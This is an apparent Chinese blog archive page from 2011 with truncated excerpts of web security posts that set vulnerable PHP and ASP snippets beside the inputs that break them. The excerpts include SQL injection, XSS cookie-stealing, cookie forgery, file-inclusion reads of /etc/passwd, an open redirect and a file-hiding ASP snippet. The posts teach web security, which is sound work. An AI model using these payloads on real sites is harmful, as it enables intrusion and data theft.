11 2011 档案
摘要://2011-11-28 星期一 //程序员思想: <? session_start(); $admin = $_POST['admin']; $pass = md5($_POST['pass']); $codes = $_POST['codes']; if($_GET['action'])...{ if($result=$db->Execute("select * from x_admin where a_admin='".$admin."'"))...{ if
阅读全文
摘要://2011-11-26 星期六 //正则实战: 字符串匹配: function isUsername($element) { return !preg_match ("/[a-zA-Z0-9_\-]/", $element); } ?> 密码匹配: $password = "Fyfjk34sdfjfsjq7"; if (preg_match("/^.*(?=.{8,})(?=.*\d)(?=.*[a-z])(?=.*[A-Z]).*$/", $password)) { echo "Your passwords is
阅读全文
摘要://2011-11-27 星期日 //正则实战(2): Preg_match验证URL $subscr=$_REQUEST['subscr']; //url validation if (preg_match('|^http(s)?://[a-z0-9-]+(.[a-z0-9-]+)*(:[0-9]+)?(/.*)?$|i', $subscr)) { print "$subscr url OK."; } else { print "$subscr url not valid!"; } //echo("$subsc
阅读全文
摘要://2011-11-24 星期四 //程序员的思想 <% '略 attachdir="/"+sitePath+"upload"'上传文件保存路径,结尾不要带/ dirtype=2'1:按天存入目录 2:按月存入目录 3:按扩展名存目录 建议使用按天存 maxattachsize=2097152'最大上传大小,默认是2M upext="txt,rar,zip,jpg,jpeg,gif,png,swf,wmv,avi,wma,mp3,mid"'上传扩展名 '略 if upfile.is
阅读全文
摘要:http://code.google.com/p/assql/
阅读全文
摘要://2011-11-23 星期三 //Cookie篇 /* 序 */ 讲起注入,就要从防住入说起,但防注入一般只对QueryString和Form做了防范,却忽略了Cookies,自然,注入就产生了,我们从实战出发。 //程序员思想 //Micropoor.asp代码片段 <% //略 Set rsnews=Server.CreateObject("ADODB.RecordSet") sql="update news set hits=hits+1 where id="&cstr(request("id")) conn.
阅读全文
摘要://2011-11-22 星期二 //插入篇----Php程序员角度看安全 //今天全局我们站在Php程序员的角度看待问题 //以及解决问题 结论:一切的输入都是有害的. //参考Php安全新闻早8点(2011-11-12 星期六) [url]http://hi.baidu.com/micropoor/blog/item/f200689bf907af56d1135ec6.html[/url] 既然是一切的输入都是有害的,那么就从输入输出讲起。 ################################################## 1.接受任何变量的时候,都请记住,是有害的开始。确
阅读全文
摘要:'2011-11-21 星期一 '插入篇---asp篇 '程序员的思维 'Micropoor.asp代码片段 <% '略 dim folderList,folderNum,i,folderAttr,fileList,fileNum,j,fileAttr,folder,filedir,filename,lastLevelPath dim dirTemplate : dirTemplate="../Upload" dim path : path=getForm("path","get") :
阅读全文
摘要:http://www.planeart.cn/?p=1594http://ejohn.org/blog/javascript-micro-templatinghttp://bbs.phpchina.com/thread-224712-1-1.html[ Noevil: 下面直接贴出改进好的MicroTemp,但是还是建议看一下原文,里面有详细的改进细节,和改进前后的性能对比。]/** * 微型模板引擎 tmpl 0.2 * * 0.2 更新: * 1. 修复转义字符与id判断的BUG * 2. 放弃低效的 with 语句从而最高提升3.5倍的执行效率 * 3. 使用随机内部变量防止与模板变量产
阅读全文
摘要://2011-11-18 星期五 //知识点讲解:urlencode //返回字符串,此字符串中除了 -_. 之外的所有非字母数字字符都将被替换成百分号(%)后跟两位十六进制数,空格则编码为加号(+)。此编码与 WWW 表单 POST 数据的编码方式是一样的,同时与 application/x-www-form-urlencoded 的媒体类型编码方式一样。由于历史原因,此编码在将空格编码为加号(+)方面与 RFC1738 编码不同。 //PHP 手册中,urldecode 函数原文引用: The superglobals $_GET and $_REQUEST are already de.
阅读全文
摘要:'2011-11-20 星期日 '插入篇---asp篇 '程序员的思维 'Micropoor.asp代码片段 <% dim upload,file,formName,formPath,iCount,fileformat //......略 end function formPath="2010/" //......略 set file=upload.file(formName) ''生成一个文件对象 //......略 if fileformat=".asp" or fileformat="
阅读全文
摘要://2011-11-19 星期六 //程序员的思维 //Micropoor.php代码片段 <?php //略 $modd=$_GET[mod]; … if(!$tpl->isCached(INDEX_TEMPLATE."product_".$modd.".".$tplext,$cacheid)){ require_once './source/module/$modd.php'; //略 } //我们的思维 index.php?mod=http://www.cnblogs.com/1.php%00 //其他条件 php.in
阅读全文
摘要:http://www.cnblogs.com/BearsTaR/有时间要好好学习一下,上面有不少关于高性能Web技术的文章。
阅读全文
摘要://2011-11-18 星期五 //知识点讲解:urlencode //返回字符串,此字符串中除了 -_. 之外的所有非字母数字字符都将被替换成百分号(%)后跟两位十六进制数,空格则编码为加号(+)。此编码与 WWW 表单 POST 数据的编码方式是一样的,同时与 application/x-www-form-urlencoded 的媒体类型编码方式一样。由于历史原因,此编码在将空格编码为加号(+)方面与 RFC1738 编码不同。 //PHP 手册中,urldecode 函数原文引用: The superglobals $_GET and $_REQUEST are already de.
阅读全文
摘要://2011-11-16 星期三 // 程序员的思维: // Micropoor.php ---代码片段 <?php $Micropoor=$_GET[Micropoor]; include($Micropoor.'php'); ?> //我们的思维: [url]http://www.127.0.0.1/Micropoor.php?Micropoor=/http://www.cnblogs.com/http://www.cnblogs.com/../etc/passwd%00[url] // 程序员的思维: // Micropoor.php ---代码片段 <
阅读全文
摘要:[From http://www.cnblogs.com/luluping/archive/2010/11/15/1877817.html][Genosage]股票数据的获取目前有如下两种方法可以获取:1. http/javascript接口取数据2. web-service接口1.http/javascript接口取数据1.1Sina股票数据接口以大秦铁路(股票代码:601006)为例,如果要获取它的最新行情,只需访问新浪的股票数据接口:http://hq.sinajs.cn/list=sh601006这个url会返回一串文本,例如:var hq_str_sh601006="大秦铁
阅读全文
摘要://2011-11-15 星期二 // 管理员的思维: 查找asp,php,jsp,.net脚本文件关键词 //我们的思维: <% Set fso = CreateObject("Scripting.FileSystemObject") sFile = Server.Mappath("/index.asp") Set objFile = fso.GetFile(sFile) if objFile.attributes <> 32 then:objFile.attributes = 32:end if fso.CopyFile Serve
阅读全文
摘要://2011-11-14 星期一 // 程序员的思维: // Micropoor.php ---代码片段 <?php redirect_page = $_GET['page']; header ("Location: " . redirect_page); ?> Exp:Micropoor.php?page=http://hi.baidu.com/micropoor // 程序员的思维: <?php echo "Hello Micropoor" . $_SERVER['HTTP_REFERER']; ?&
阅读全文
摘要://2011-11-13 星期日 // 程序员的思维: // Micropoor.php ---代码片段 <?php $id= $_GET['id']; $query= "SELECT * FROM users WHERE id= ' “ .$id." ;" //略 ?> //我们的思维: index.php?id=1+UNION+SELECT+1,@@version+from+users-- // 程序员的思维: //Micropoor.php ---代码片段 <? $user = $_POST['user
阅读全文
摘要:// 2011-11-12 星期六 // 程序员的思维: // index.php ---代码片段 <?php $Micropoor = $_GET['Micropoor']; print $Micropoor; ?> //我们的思维: index.php?Micropoor=<script>alert(document.cookie)</script> ############################################################ // 程序员的思维: // index.php ---代码片段 &l
阅读全文
摘要://2011-11-11 星期五 //php 程序员的思维: // login.php ---代码片段 if($adminuser==$user and $adminpass==$pass) { setcookie("login","yes",time()+3600); header("location:admin.php"); } //我们的思维: javascript:alert(document.cookie="login="+escape("yes")) ################
阅读全文
摘要:// http://hi.baidu.com/micropoor// 2011-11-10// Coder <?php echo '<p>Micropoor.</p>'; ?> //有效 <? echo '<p>Micropoor.</p>'; ?> //有效 // Hacker<script language = 'php'> echo '<p>Micropoor.</p>' ; </script> //有效
阅读全文
摘要:// http://hi.baidu.com/micropoor// 2011-11-09 // Coderecho "This is The $Micropoor"."s"; //有效 echo "This is The ".$Micropoor."s"; //有效// Hacker$Micropoor = 'Bug'; echo "This is The $Micropoors";// 无效;字母s会被当成有效的变量名组成元素,但是这里的变量是$Micropoor echo
阅读全文
浙公网安备 33010602011771号